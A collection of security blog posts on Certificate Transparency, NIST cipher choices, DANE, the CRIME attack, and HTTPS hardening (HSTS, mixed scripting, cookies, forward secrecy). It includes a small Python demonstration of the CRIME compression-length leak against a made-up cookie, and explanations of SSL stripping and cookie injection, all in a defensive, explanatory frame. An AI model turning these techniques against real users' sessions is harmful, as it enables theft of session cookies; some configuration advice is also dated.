Well, we can have an independent certificate log sign a statement of publication and, based on our constraints, we have to put that signature somewhere in the TLS handshake. We call the statements of publication Signed Certificate Timestamps (SCTs) and, since we don't want to delay certificate issuance, they’re not actually statements of publication; rather, they are a promise that the certificate will be published soon.

Now we've just moved the problem from "what if the CA doesn't publish it?" to "what if the log promises to publish something, but doesn't?". We can require SCTs from a quorum of independent logs, and we'll do that, but running an append-only log is also a job that can be verified by clients.

In order to make a log verifiable, we put the log entries in a Merkle tree, with certificates at the leaves. Each log is an ever growing Merkle tree of certificates and the log periodically signs the root of the tree and publishes it, along with all the entries. But what does `periodically' mean? All logs must publish certificates that they have received within a time called the Maximum Merge Delay. That merge delay is the amount of time that a certificate can be used without being published.

We detect violations of the MMD by having clients verify the log's behaviour. Clients can request from the logs (or a mirror), a path from any certificate to the root of a published Merkle tree. In order to preserve client privacy this request may be made via DNS, if possible, or by requesting paths for a range of certificates rather than a specific one.
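To make the "path from any certificate to the root" idea concrete, here is a minimal sketch of a Merkle tree log with an audit path check. It assumes the hashing layout that RFC 6962 later specified (SHA-256, a 0x00 prefix for leaves, a 0x01 prefix for interior nodes, splitting at the largest power of two below the entry count). The function names are mine, and tagging each sibling with its side is a simplification: a real client would derive the sides from the leaf index and the tree size.

```python
import hashlib

def leaf_hash(entry: bytes) -> bytes:
    # Leaves and interior nodes use different prefixes so that one
    # can never be mistaken for the other.
    return hashlib.sha256(b"\x00" + entry).digest()

def node_hash(left: bytes, right: bytes) -> bytes:
    return hashlib.sha256(b"\x01" + left + right).digest()

def split_point(n: int) -> int:
    # Largest power of two strictly less than n (for n >= 2).
    k = 1
    while k * 2 < n:
        k *= 2
    return k

def tree_root(entries) -> bytes:
    if not entries:
        return hashlib.sha256(b"").digest()
    if len(entries) == 1:
        return leaf_hash(entries[0])
    k = split_point(len(entries))
    return node_hash(tree_root(entries[:k]), tree_root(entries[k:]))

def audit_path(entries, index: int):
    # Sibling hashes from the leaf up to the root. Each is tagged with
    # the side ("L" or "R") that the sibling sits on.
    if len(entries) == 1:
        return []
    k = split_point(len(entries))
    if index < k:
        return audit_path(entries[:k], index) + [("R", tree_root(entries[k:]))]
    return audit_path(entries[k:], index - k) + [("L", tree_root(entries[:k]))]

def verify(entry: bytes, path, root: bytes) -> bool:
    # Recompute the root from the entry and its siblings and compare it
    # with the root that the log signed.
    h = leaf_hash(entry)
    for side, sibling in path:
        h = node_hash(sibling, h) if side == "L" else node_hash(h, sibling)
    return h == root

certs = [f"cert-{i}".encode() for i in range(7)]
root = tree_root(certs)
print(verify(certs[3], audit_path(certs, 3), root))
```

The client only needs a logarithmic number of hashes to check that a certificate sits under a signed root, which is why a log can be audited without downloading all of it.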

Once a client has a signed root, it needs to gossip about it. Clients implicitly trust their software provider so one common answer may be to request a signed statement that the log root has been observed from an auditor service run by them. But these auditors can be run by anyone, and clients can configure their auditor however they like.

Since these client checks are asynchronous, they can be blocked by an attacker. Clients will have to be tolerant of that to some extent because many networks are indistinguishable from an attack. However, if after some amount of time, the client has a certificate that it hasn't been able to check, or a log root that it hasn't verified with its auditor, it should try to publish it in various, unspecified ways. In the extreme, one can imagine asking the user to email a file to an email address.

So to `break' this system, by which I mean to get a certificate that will be silently accepted by clients without the world knowing about it, one needs to compromise a CA, a quorum of logs, and then either partition the client forever, or also compromise the client's auditor.

In addition to auditors, there’s another class of log observers: monitors. Monitors watch the logs for interesting events. We envision at least one, obvious, type of monitor service: an `alerts' system where anyone can sign up to receive emails when a certificate is issued in a certain domain.

So now some practical points:

First, how do we get the SCTs (the receipts from the logs) into the TLS handshake without altering every HTTPS server? Well, the one thing that every HTTPS server can do is serve a certificate chain. So we tried a couple of tricks:

One, we tried adding a superfluous certificate to the end of the chain. Most clients will ignore it, but a few smaller ones, and old versions of Android, don't and IIS doesn't like configuring such a chain. So we aren't pushing ahead with that idea.

We also tried putting SCTs into the unsigned portion of the leaf certificate and that works fairly well except for breaking Java. Nonetheless, we may continue to support that as an option.

And options are the way we're going to go with this problem: there doesn't seem to be a good single answer.

So another option is that CAs can do the work for you and put the SCTs into the signed part of the certificate, in an X.509 extension. Of course, the SCT contains a hash of the certificate, and a hash cannot include itself, so CAs issue a `pre-cert' from a special intermediate with a magic EKU that makes it invalid for normal use. The pre-cert can be submitted to the logs to get SCTs for embedding in the real certificate.

Another way in which CAs can do it for you is to put the SCTs in an OCSP response and then one uses OCSP stapling on the server.

Finally, for servers that can be updated, SCTs can be included in an Authorisation Data TLS-extension, and support for that is working its way through OpenSSL and Apache.

We're experimenting with CAs at the moment to find what works and we may whittle down this list in time. But for now we're promiscuous about solutions to this problem.

The logs also have to worry about spam, so they only accept certificate chains that end at a known root. There's a very low bar for the logs to accept a root because it doesn't grant any authority, it's just an anti-spam measure, but we do have to make sure that the logs can’t be spammed to death.

Going back to one of our requirements at the beginning: we don't want to log internal names in certificates. One solution to this is to allow intermediates with name constraints to be logged and then any certificates from there don't need to be. So an intermediate constrained to issue within example.com can be logged and then we don't need to log any leaf certificates within example.com: they can't be used against anyone else and, by using an intermediate, its security is up to you.
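As a rough sketch of the client-side decision, assuming the client somehow knows which name-constrained intermediates have been logged: a leaf needs its own SCTs unless its hostname falls inside one of those constrained domains. Both function names are hypothetical and the matching is deliberately simplified to DNS suffix matching on whole labels.

```python
def within_constraint(hostname: str, permitted: str) -> bool:
    # True if hostname is the permitted domain or a subdomain of it.
    hostname = hostname.lower().rstrip(".")
    permitted = permitted.lower().rstrip(".")
    return hostname == permitted or hostname.endswith("." + permitted)

def leaf_needs_logging(hostname: str, logged_constrained_domains) -> bool:
    # A leaf is exempt only if some logged intermediate is constrained
    # to a domain that covers it.
    return not any(within_constraint(hostname, d)
                   for d in logged_constrained_domains)

print(leaf_needs_logging("wiki.corp.example.com", ["example.com"]))
print(leaf_needs_logging("www.example.org", ["example.com"]))
```

Matching on whole labels matters here: badexample.com must not be treated as inside example.com.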

However, that's a little complex so the initial solution will probably be that we let companies configure the clients to say "don't require logging within these domains". At least for Chrome, people report great success with our Enterprise Policy configuration and that's an easy route for such config.

Lastly, the very tricky question: deployment.

Initially we can deploy in the same manner as pinning and HSTS: require it only for certain, opt-in domains (or possibly for opt-in CAs). But the goal is very much to get it everywhere. That will take years, but we do plan to do it. We need to make the error messages in the browser informative for server admins as well as users because this will be something new for them, although hopefully their CA will just take care of it. We can also enforce it for certificates issued past a certain date, rather than having a flag day. That way the certificate change will be the triggering factor, which is something under the control of the site. Lastly, we'll probably have to do the work to patch software like EJBCA.

We do not yet know exactly who will be running the logs, nor how many we want. But Google expects to run one and that project is staffed. We’re also working with Digicert and Comodo who are experimenting with CT integration and are considering running logs.

Since we can verify the operation of logs, they don't have the same trusted status as CAs. However, the set of logs has to be globally agreed so having to revoke a log would be a pain, so we do want logs that are operationally competent.

There is no doubt that this will be a difficult and lengthy deployment process. But it doesn't seem completely hopeless.

NIST may not have you in mind

A couple of weeks back, NIST announced that Keccak would be SHA-3. Keccak has somewhat disappointing software performance but is a gift to hardware implementations.

This is rather a theme for NIST selected algorithms. AES includes a number of operations on a binary field and CPUs generally don't implement binary field operations because they aren't really useful for anything else. So many software implementations of AES include four, 1024-byte tables of results in that field in order to achieve reasonable performance. However, these table lookups cause a timing side-channel which is fairly effective even over a network. On the same machine, where the CPU cache state can be probed more directly, it's very effective.

In response to this, some AES implementations made their tables smaller to reduce the leak. That's obviously an improvement, but it came at the cost of slowing AES down and AES was never very quick to start off with. And while a smaller leak is better, AES is supposed to be operating at (at least) a 128-bit security level!

Next, the mode recommended for AES by NIST is GCM: it's AES in counter mode coupled with a polynomial authenticator. Cryptographically this is perfectly sensible but the polynomial authenticator uses binary fields again. For a hardware implementation, this is another gift but software implementations need, yet again, tables in memory to implement it at reasonable speed.

Tables not only cause problems with timing side-channels, they also cause slowdowns that don't appear in micro-benchmarks. Tables are great when the benchmark is running with a single key and they are contained in L1 cache. But when running in a larger system, the cache pressure causes slowdowns and the real-world speed of such an algorithm can be dramatically less than the benchmarks suggest.

But there's no reason why a polynomial authenticator needs to use binary fields. Why not use a field that CPUs actually implement? If you do so you get a very fast authenticator with dramatically improved key agility.
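To illustrate, here is a sketch of Poly1305, the authenticator I recommend later in this post, which works modulo the prime 2^130 - 5 and so needs only ordinary integer multiplication and addition. It follows the description in RFC 8439 and is checked against the test vector from that document. Python's big integers are not constant time, so treat this as a description of the arithmetic and not as something to deploy. The 32-byte key must also only ever be used for a single message.

```python
def poly1305(key: bytes, msg: bytes) -> bytes:
    if len(key) != 32:
        raise ValueError("Poly1305 needs a 32-byte one-time key")
    # r is "clamped": certain bits are cleared so that implementations
    # can avoid carries. s is added at the end to hide the polynomial.
    r = int.from_bytes(key[:16], "little") & 0x0ffffffc0ffffffc0ffffffc0fffffff
    s = int.from_bytes(key[16:], "little")
    p = (1 << 130) - 5

    acc = 0
    for i in range(0, len(msg), 16):
        # Each 16-byte chunk becomes a number with an extra high byte of 1,
        # so chunks of different lengths never collide.
        block = int.from_bytes(msg[i:i + 16] + b"\x01", "little")
        acc = (acc + block) * r % p

    return ((acc + s) % (1 << 128)).to_bytes(16, "little")

key = bytes.fromhex(
    "85d6be7857556d337f4452fe42d506a8"
    "0103808afb0db2fd4abff6af4149f51b")
tag = poly1305(key, b"Cryptographic Forum Research Group")
print(tag.hex())
```

There are no tables here at all: the per-message state is one accumulator, which is where the key agility comes from.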

So why does NIST continually pick algorithms that aren't suited to software implementations? One of my colleagues proffers (somewhat jokingly) a conspiracy theory but I suspect that the answer is much more mundane. At USENIX Security this year, Dickie George gave an excellent keynote involving some NSA history and described how they would spend a decade or more designing a cryptographic system from the chip upwards. Everything was custom built, carefully designed and it was a completely closed system. It's certainly nice to be able to do that!

If you're designing such a system, of course you would be orientated towards hardware. Every implementation of your system would be a custom-designed chip; there's no benefit to making something easy to implement on commodity systems. And, in that world, AES, GCM, and SHA3 make a lot of sense. As the GCM paper says, “binary Galois field multiplication is especially suitable for hardware implementations”. I'm assuming that there's a fair amount of shared worldview between NIST and the NSA, but that doesn't seem unreasonable.

(In a NIST paper about the selection of AES they state: “table lookup: not vulnerable to timing attacks.” Oops. If you're building your own hardware, maybe.)

I'm not suggesting that the NSA is actually using AES, GCM etc in their own designs. But a generation or more of cryptographers from that world are probably comfortable with features that were chosen with hardware in mind. Those features, like binary fields, are what they will naturally gravitate towards.

People who aren't in the situation of designing custom chips, but rather have to design protocols for implementation on a menagerie of commodity chips, might want to consider that NIST doesn't appear to have them in mind. Although hardware implementations of AES have existed for a while, unless they are CPU instructions (like AES-NI), then the system-call overhead can cause the acceleration to be slower than the plain CPU for common, 1400-byte, chunk sizes. Even when you have a CPU instruction to implement AES and GCM, it's unlikely that all the chips that your code is going to run on will be so endowed.

Hardware implementations of these poorly-suited primitives also take chip area and development time away from other tasks. Why not choose primitives that use CPU abilities that lots of code benefits from? Then optimisations of those CPU instructions lift all boats.

So if you want to pick algorithms designed for CPUs, try Salsa20 rather than AES and Poly1305 rather than GCM. But we don't have a great answer for a modern hash function I'm afraid, and that's a little disappointing. SHA-2 is fine for now, although Zooko has some thoughts on the matter.

(I should note that, thanks to some great work by djb, Peter Schwabe, Emilia Käsper and others, we do have bitsliced, constant-time implementations of AES now that run reasonably fast (for AES). But it's only effective for counter mode, and I believe that it needs long streams of data to achieve its headline speed. (A commenter pointed out that it can be made to work with only 8 blocks. Later, another pointed out that I'm doubly wrong! We can do it for single blocks in reasonable time.) That's great, but it took 10 years of optimisation work and implies that AES can only be effectively implemented by some of the best practical cryptographers in the world.)

DANE stapled certificates

We've supported DNSSEC stapled certificates in Chrome for a while now and since the DANE RFC has been published, it's about time that I updated that code to support DANE, rather than the hacked up CAA record that it currently uses.

I've written the DANE code, but it also seemed like an opportune time to reevaluate the idea. The promise of DNSSEC, as Dan Kaminsky put it, is that it can reduce the number of meetings required to get something done.

You have a whole bunch of internal hosts that some company that you're partnering with needs to interface with securely? Well, perhaps you used an internal CA, so will they install that root on their systems? (Meeting.) They will if it's name constrained, can we get it reissued with name constraints? (Meeting.) Ok, now can IT get that root pushed out everywhere? (Meeting.) You see how this is going.

But every bit of code needs to justify its complexity and, for small cases, StartSSL will give you free certificates. Perhaps just Chrome doing it isn't very interesting, and everyone hacks up custom solutions anyway.

So, if it's useful to you, you should let me know (agl at chromium dot org).

CRIME

Last year I happened to worry on the SPDY mailing list about whether sensitive information could be obtained via SPDY's use of zlib for compressing headers. Sadly, I never got the time to follow up and find out whether it was a viable attack. Thankfully there exist security researchers who, independently, wondered the same thing and did the work for me! Today Duong and Rizzo presented that work at ekoparty 2012.

They were also kind enough to let Firefox and ourselves know ahead of time so that we could develop and push security fixes before the public presentation. In order to explain what we did, let's start by looking at how SPDY compressed headers:

(This is inline SVG, if you can't see it, check here.)

[Diagram: the zlib-compressed SPDY header blocks for two requests to www.google.com. The first block carries the :host, :method, :path, :scheme, :version, accept, accept-charset, accept-encoding, accept-language, cookie, user-agent and x-chrome-variations headers. The second block begins with :host, :method and a long /csi path with many query parameters.]

That's a pretty busy diagram! But I don't think it's too bad with a bit of explanation:

zlib uses a language with basically two statements: “output these literal bytes” and “go back x bytes and duplicate y bytes from there”. In the diagram, red text was included literally and black text came from duplicating previous text.
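That two-statement language is small enough to write an interpreter for. The sketch below is not zlib's real bit-level format (it skips Huffman coding entirely); the tuple encoding of the two statements is made up for illustration.

```python
def expand(ops) -> bytes:
    out = bytearray()
    for op in ops:
        if op[0] == "literal":
            # "output these literal bytes"
            out += op[1]
        else:
            # "go back `distance` bytes and duplicate `length` bytes"
            _, distance, length = op
            for _ in range(length):
                # Copying byte by byte lets a copy overlap its own output,
                # which is how long runs are encoded.
                out.append(out[-distance])
    return bytes(out)

ops = [
    ("literal", b"accept-charset "),
    ("copy", 15, 7),          # duplicates "accept-"
    ("literal", b"encoding"),
]
print(expand(ops))
```

In the terms of the diagram, the "literal" statements are the red text and the "copy" statements are the black, underlined text.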

The duplicated text is underlined. A dark blue underline means that the original text is in the diagram and there will be a gray line pointing to where it came from. (You can hover the mouse over one of those lines to make it darker.)

A light blue underline means that the original text came from a pre-shared dictionary of strings. SPDY defines some common text, for zlib to be able to refer to, that contains strings that we expect to find in the headers. This is most useful at the beginning of compression when there wouldn't otherwise be any text to refer back to.

The problem that CRIME highlights is that sensitive cookie data and an attacker-controlled path are compressed together in the same context. Cookie data makes up most of the red, uncompressed bytes in the diagram. If the path contains some cookie data, then the compressed headers will be shorter because zlib will be able to refer back to the path, rather than have to output all the literal bytes of the cookie. If you arrange things so that you can probe the contents of the cookie incrementally, then (assuming that the cookie is base64), you can extract the cookie byte-by-byte by inducing the browser to make requests.
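The length leak is easy to see with Python's zlib module. This is only a sketch of the underlying effect, not of the real attack: the header layout, the hostname and the cookie value are all invented, it uses plain HTTP-style headers in place of SPDY framing, and it compares one fully correct guess against one wrong guess of the same length. The real attack has to work a byte at a time and cope with Huffman coding noise.

```python
import zlib

# Hypothetical secret that the attacker wants to learn.
SECRET_COOKIE = "sessionid=7f3a9c"

def compressed_length(attacker_path: str) -> int:
    # The attacker-controlled path and the secret cookie are compressed
    # together, in the same context.
    headers = (
        f"GET {attacker_path} HTTP/1.1\r\n"
        "Host: example.com\r\n"
        f"Cookie: {SECRET_COOKIE}\r\n"
        "\r\n"
    )
    return len(zlib.compress(headers.encode()))

right = compressed_length("/?sessionid=7f3a9c")
wrong = compressed_length("/?sessionid=b2e8d1")

# With the right guess, the whole cookie can be a back reference to the
# path. With the wrong guess, the tail of the cookie has to be literals.
print(right, wrong)
```

The attacker never sees the plaintext, only the two lengths on the wire, and that is enough to tell the guesses apart.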

For details of how to get zlib to reveal that information in practice, I'll just refer you to Duong and Rizzo's CRIME presentation. It's good work.

In order to carry out this attack, the attacker needs to be able to observe your network traffic and to be able to cause many arbitrary requests to be sent. An active network attacker can do both by injecting Javascript into any HTTP page load that you make in the same session.

When we learned of this work, we were already in the process of designing the compression for SPDY/4, which avoids this problem. But we still needed to do something about SPDY/2 and SPDY/3 which are currently deployed. To that end, Chrome 21 and Firefox 15 have switched off SPDY header compression because that's a minimal change that easily backports.

Chrome has also switched off TLS compression, through which a very similar attack can be mounted.

But we like SPDY header compression because it saves significant amounts of data on the wire! Since SPDY/4 isn't ready to go yet we have a more complex solution for Chrome 22/23 that compresses data separately while still being backwards compatible.

Most importantly, cookie data will only ever be duplicated exactly, and in its entirety, against other cookie data. Each cookie will also be placed in its own Huffman group (Huffman coding is a zlib detail that I skipped over in the explanation above). Finally, in case other headers contain sensitive data (e.g. when set by an XMLHttpRequest), non-standard headers will be compressed in their own Huffman group without any back references.

That's only a brief overview of the rules. The code to follow them and continue to produce a valid zlib stream wasn't one of the cleaner patches ever landed in Chrome and I'll be happy to revert it when SPDY/4 is ready. But it's effective at getting much of the benefit of compression back.

To the right are a couple of images of the same sort of diagram as above, but zoomed out. At this level of zoom, all you can really see are the blocks of red (literal) and blue (duplicated) bytes. The diagram on the right has the new rules enabled and, as you can see, there is certainly more red in there. However that's mostly the result of limited window size. In order to save on server memory, Chrome only uses 2048-byte compression windows and, under the new rules, a previous cookie value has to fit completely within the window in order to be matched. So things are a little less efficient until SPDY/4, although we might choose to trade a little more memory to make up for that.
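The effect of the window size can be sketched with Python's zlib module, where wbits=11 gives a 2048-byte window and wbits=15 gives the usual 32KiB one. The cookie and the filler between its two appearances are pseudo-random hex generated for this example and stand in for real header data.

```python
import hashlib
import zlib

def pseudo_random_hex(n: int, seed: bytes) -> bytes:
    # Deterministic filler that has no long repeats.
    out = b""
    counter = 0
    while len(out) < n:
        block = hashlib.sha256(seed + counter.to_bytes(4, "big")).hexdigest()
        out += block.encode()
        counter += 1
    return out[:n]

def deflated_length(data: bytes, wbits: int) -> int:
    c = zlib.compressobj(level=6, method=zlib.DEFLATED, wbits=wbits)
    return len(c.compress(data) + c.flush())

cookie = pseudo_random_hex(200, b"cookie")
filler = pseudo_random_hex(3000, b"other headers")

# The second copy of the cookie is more than 2048 bytes after the first.
data = cookie + filler + cookie

small_window = deflated_length(data, wbits=11)
large_window = deflated_length(data, wbits=15)
print(small_window, large_window)
```

With the small window the first copy of the cookie has already fallen out of reach when the second arrives, so it has to be sent as literals again.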

SSL interstitial bypass rates

In yesterday's post I threw in the following that I've been asked to clarify:

“we know that those bypass buttons are clicked 60% of the time by Chrome users”

Chrome collects anonymous statistics from users who opt in to such collection (and thank you to those who do!). One of those statistics covers how frequently people bypass SSL interstitials. (As always, the Chrome privacy policy has the details.)

We define bypassing the interstitial as clicking the ‘Proceed anyway’ button and not bypassing as either closing the tab, navigating elsewhere, or clicking the ‘Back’ button.

I picked five days at random over the past six weeks and averaged the percentages of the time that users bypassed rather than not. That came to 61.6%.

There may be some biases here: we may have a biased population because we only include users who have opted in to statistics collection. We are also counting all interstitials: there may be a small number of users who bypass a lot of SSL errors. But that's the data that we have.

Living with HTTPS

(These are my notes from the first half of my talk at HOPE9 last weekend. I write notes like these not as a script, but so that I have at least some words ready in my head when I'm speaking. They are more conversational and less organised than a usual blog post, so please forgive me the rough edges.)

HTTPS tends to cause people to give talks mocking certificate security and the ecosystem around it. Perhaps that's well deserved, but that's not what this talk is about. If you want to have fun at the expense of CAs, dig up one of Moxie's talks. This talk deals with the fact that your HTTPS site, and the sites that you use, probably don't even reach the level where you get to start worrying about certificates.

I'm a transport security person so the model for this talk is that we have two computers talking over a malicious network. We assume that the computers themselves are honest and uncompromised. That might be a stretch in these malware-ridden times, but that's the area of host security and I'm not talking about that today. The network can drop, alter or fabricate packets at will. As a lemma, we also assume that the network can cause the browser to load any URL it wishes. The network can do this by inserting HTML into any HTTP response and we assume that every user makes some unencrypted requests while browsing.

Stripping

If the average user typed mail.google.com into a browser and saw the following, what fraction of them do you think would log in, none the wiser?

Can you even see what's terribly wrong here?

The problem is that the page isn't served over HTTPS. It should have been, but when a user types a hostname into a browser, the default scheme is HTTP. The server may attempt to redirect users to HTTPS, but that redirect is insecure: a MITM attacker can rewrite it and keep the user on HTTP, spoofing the real site the whole time. The attacker can now intercept all the traffic to this perfectly well configured and secure website.

This is called SSL stripping and it's terribly simple and devastatingly effective. We probably don't see it very often because it's not something that corporate proxies need to do, so it's not in off-the-shelf devices. But that respite is unlikely to last very long and maybe it's already over: how would we even know if it was being used?

In order to stop SSL stripping, we need to make HTTPS the only protocol. We can't do that for the whole Internet, but we can do it site-by-site with HTTP Strict Transport Security (HSTS).

HSTS tells browsers to always make requests over HTTPS to HSTS sites. Sites become HSTS either by being built into the browser, or by advertising a header:

Strict-Transport-Security: max-age=8640000; includeSubDomains

The header is in force for the given number of seconds and may also apply to all subdomains. The header must be received over a clean HTTPS connection.
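Here is a sketch of what a client might do with that header. The `HSTSStore` class and its method names are invented for this example. It assumes the header was already received over a clean HTTPS connection, and it treats max-age=0 as a request to forget the host, as RFC 6797 describes. Note that 8640000 seconds is 100 days.

```python
def parse_hsts(value: str):
    max_age = None
    include_subdomains = False
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            max_age = int(arg.strip().strip('"'))
        elif name == "includesubdomains":
            include_subdomains = True
    if max_age is None:
        raise ValueError("max-age is required")
    return max_age, include_subdomains

class HSTSStore:
    def __init__(self):
        self._entries = {}  # host -> (expiry time, include_subdomains)

    def note(self, host: str, header_value: str, now: int) -> None:
        max_age, subdomains = parse_hsts(header_value)
        if max_age == 0:
            self._entries.pop(host.lower(), None)
        else:
            self._entries[host.lower()] = (now + max_age, subdomains)

    def must_use_https(self, host: str, now: int) -> bool:
        # Check the host itself, then each parent domain that asked for
        # its subdomains to be covered.
        labels = host.lower().split(".")
        for i in range(len(labels)):
            entry = self._entries.get(".".join(labels[i:]))
            if entry and now < entry[0] and (i == 0 or entry[1]):
                return True
        return False

store = HSTSStore()
store.note("example.com", "max-age=8640000; includeSubDomains", now=0)
print(store.must_use_https("mail.example.com", now=86400))
```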

Once the browser knows that a site is HTTPS only, the user typing mail.google.com is safe: the initial request uses HTTPS and there's no hole for an attacker to exploit.

(mail.google.com and a number of other sites are already built into Chrome as HSTS sites so it's not actually possible to access accounts.google.com over HTTP with Chrome - I had to doctor that image! If you want to be included in Chrome's built-in HSTS list, email me.)

HSTS can also protect you, the webmaster, from making silly mistakes. Let's assume that you've told your mother that she should always type https:// before going to her banking site or maybe you set up a bookmark for her. That's honestly more than we can, or should, expect of our users. But let's say that our supererogatory user enters https://www.citibank.com in order to securely connect to her bank. What happens? Well, https://www.citibank.com redirects her to http://www.citibank.com. They've downgraded the user! From there, the HTTP site should redirect back to HTTPS, but the damage has been done. An attacker can get in through the hole.

I'm honestly not picking on Citibank here. They were simply the second site that I tried and I was somewhat surprised that the first site didn't have the problem. It's a very easy mistake to make, and everything just works! It's a completely silent disaster! But HSTS would have either prevented it, or would have failed closed.

HSTS also does something else. It turns this:

Into this:

The “bypass this certificate error” button has gone. That button is a UI disaster. Asking regular people to evaluate the validity of X.509 certificates is insane. It's a security cop-out that we're saddled with, and which is causing real damage.

We've seen widespread MITM attacks using invalid certificates in Syria and, in recent weeks, Jordan. These certificates are invalid! This is squarely within our threat model for transport security and it shouldn't have been a risk for anybody. But we know that those bypass buttons are clicked 60% of the time by Chrome users. People are certainly habituated to clicking them and I bet that a large number of people were victims of attacks that we should have been able to prevent.

If you take only one thing away from this talk, HSTS should be it.

Mixed scripting

Once we've sorted HSTS we have another problem. These snippets of HTML are gaping wide holes in your security:

<script src="http://...

<link href="http://...

<embed src="http://...

It's called mixed scripting and it happens when a secure site loads critical sub-resources over HTTP. It's a subset of mixed content: mixed content covers loading any sub-resource insecurely. Mixed content is bad, but when the resource is Javascript, CSS, or a plugin we give it another name to make it clear that it's a lot more damaging.

When you load sub-resources over HTTP, an attacker can replace them with content of their choosing. The attacker also gets to choose any page on your HTTPS site with the problem. That includes pages that you don't expect to be served over HTTPS, but happen to be mapped. If you have this problem anywhere, on any HTTPS page, the attacker wins.
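One way to hunt for the problem is to scan your own pages for the three patterns above. This is a minimal sketch using Python's standard html.parser. The class name is mine, it only looks at static markup (so anything inserted by script is missed), and it flags every http:// `<link>`, not only stylesheets.

```python
from html.parser import HTMLParser

# Tags that can load active content, and the attribute holding the URL.
ACTIVE_TAGS = {"script": "src", "link": "href", "embed": "src"}

class MixedScriptFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        wanted = ACTIVE_TAGS.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value and value.lower().startswith("http://"):
                self.findings.append((tag, value))

page = """
<html><head>
<script src="http://cdn.example.com/a.js"></script>
<link rel="stylesheet" href="http://example.com/style.css">
<script src="https://example.com/safe.js"></script>
</head><body><img src="http://example.com/cat.png"></body></html>
"""

finder = MixedScriptFinder()
finder.feed(page)
for tag, url in finder.findings:
    print(tag, url)
```

The image is left out on purpose: that is mixed content, but not mixed scripting.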

With complex sites, it's very difficult to ensure that this doesn't happen. One good way to limit it is to only serve over HTTPS so that there aren't any pages that you expect to serve over HTTP. HSTS might also save you if you're loading mixed script from the same domain.

Another mitigation is to use scheme-relative URLs everywhere possible. These URLs look like //example.com/bar.js and are valid in all browsers. They inherit the scheme of the parent page, which will be HTTP or HTTPS as needed. (Although it does mean that if you load the page from disk then things will break. The scheme will be file:// in that case.)
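Python's `urllib.parse.urljoin` follows the same resolution rules as a browser here, so it can show how a scheme-relative URL picks up the scheme of the page that contains it. The page URLs are made up for the example.

```python
from urllib.parse import urljoin

def resolve(page_url: str, reference: str) -> str:
    # Resolve a reference found in a page against that page's own URL.
    return urljoin(page_url, reference)

for page in ("https://example.com/index.html",
             "http://example.com/index.html",
             "file:///home/user/index.html"):
    print(page, "->", resolve(page, "//example.com/bar.js"))
```

The last case is the breakage mentioned above: the reference inherits the file scheme and no longer points at the web server.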

Fundamentally this is such an easy mistake to make, and such a problem, that the only long term solution is for browsers to stop loading insecure Javascript, CSS and plugins for HTTPS sites. To their credit, IE9 does this and did it before Chrome. But I'm glad to say that Chrome has caught up and mixed scripting is now blocked by default, although with a user-override:

Yes, there's another of those damn bypass buttons. But we swear that it's just a transitional strategy and it already stops silent exploitation in a hidden iframe.

Cookies

HTTP and HTTPS cookie jars are the same. No really: cookies aren't scoped to a protocol! That means that if you set a Cookie on https://example.com and then make a request to http://example.com, the cookies will be sent in the clear! In order to prevent this, you should be setting secure on your HTTPS cookies. Sadly this is a very easy thing to miss because everything will still work if you omit it, but without the secure tag, attackers can easily steal your cookies.
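Most frameworks have a switch for this. As a sketch using only Python's standard library, here is how the attribute ends up in a Set-Cookie value; the cookie name and value are placeholders.

```python
from http.cookies import SimpleCookie

def session_cookie(name: str, value: str) -> str:
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["path"] = "/"
    # Without this attribute the browser will also send the cookie over
    # plain HTTP, where the network can read it.
    cookie[name]["secure"] = True
    return cookie[name].OutputString()

print("Set-Cookie:", session_cookie("session", "abc123"))
```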

It's worth noting that HSTS can protect you from this: by preventing the HTTP request from being sent, the cookies can't be leaked that way, but you'll need to include all subdomains in the HSTS coverage.

There's a second corollary to this: attackers can set your HTTPS cookies too. By causing a request to be sent to http://example.com, they can spoof a reply with cookies that then override any existing cookies. In this fashion, an attacker can log a user in as themselves during their interaction with an HTTPS site. Then, say, emails that they send will be saved in the attacker's out-box.

There's no very good protection against this except HSTS again. By preventing any HTTP requests you can stop the attacker from spoofing a reply to set the cookies. Again, HSTS needs to cover all subdomains in order to be effective against this.

Get yourself checked out

You should go to https://www.ssllabs.com and run their scan against your site. It's very good, but ignore it if it complains about the BEAST attack. It'll do so if you make a CBC ciphersuite your top preference. Browsers have worked around BEAST and non-browser clients are very unlikely to provide the attacker enough access to be able to pull it off. You have a limited amount of resources to address HTTPS issues and I don't think BEAST should make the list.

Get a real certificate

You should get a real certificate. You probably already have one but, if you don't, then you're just training more people to ignore certificate errors and you can't have HSTS without a real certificate. StartSSL give them away for free. Get one.

If you've reached this far and have done all of the above, congratulations: you're in the top 0.1% of HTTPS sites. If you're getting bored, this is a reasonable point to stop reading: everything else is just bonus points from now on.

Forward secrecy

You should consider forward secrecy. Forward secrecy means that the keys for a connection aren't stored on disk. You might have limited the amount of information that you log in order to protect the privacy of your users, but if you don't have forward secrecy then your private key is capable of decrypting all past connections. Someone else might be doing the logging for you.

In order to enable forward secrecy you need to have DHE or ECDHE ciphersuites as your top preference. DHE ciphersuites are somewhat expensive if you're terminating lots of SSL connections and you should be aware that your server will probably only allow 1024-bit DHE. I think 1024-bit DHE-RSA is preferable to 2048-bit RSA, but opinions vary. If you're using ECDHE, use P-256.

You also need to be aware of Session Tickets in order to implement forward secrecy correctly. There are two ways to resume a TLS connection: either the server chooses a random number and both sides store the session information, or the server can encrypt the session information with a secret, local key and send that to the client. The former is called Session IDs and the latter is called Session Tickets.

But Session Tickets are transmitted over the wire and so the server's Session Ticket encryption key is capable of decrypting past connections. Most servers will generate a random Session Ticket key at startup unless otherwise configured, but you should check.
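Purely as an illustration of the two knobs discussed above, here is a sketch using Python's ssl module as a stand-in for a real webserver. The cipher string is an OpenSSL-style list chosen for this example, and switching Session Tickets off entirely is a blunt assumption on my part: a server that generates a fresh ticket key at startup may be perfectly fine.

```python
import ssl


def forward_secret_server_context():
    """Build a server-side context that prefers ECDHE and issues no tickets."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # Only offer ECDHE key exchange for the configurable ciphersuites.
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+AES")
    # Use P-256 (OpenSSL calls it prime256v1) for the ECDHE exchange.
    ctx.set_ecdh_curve("prime256v1")
    # Don't hand out Session Tickets, so no long-lived ticket key can
    # decrypt past connections.
    ctx.options |= ssl.OP_NO_TICKET
    return ctx


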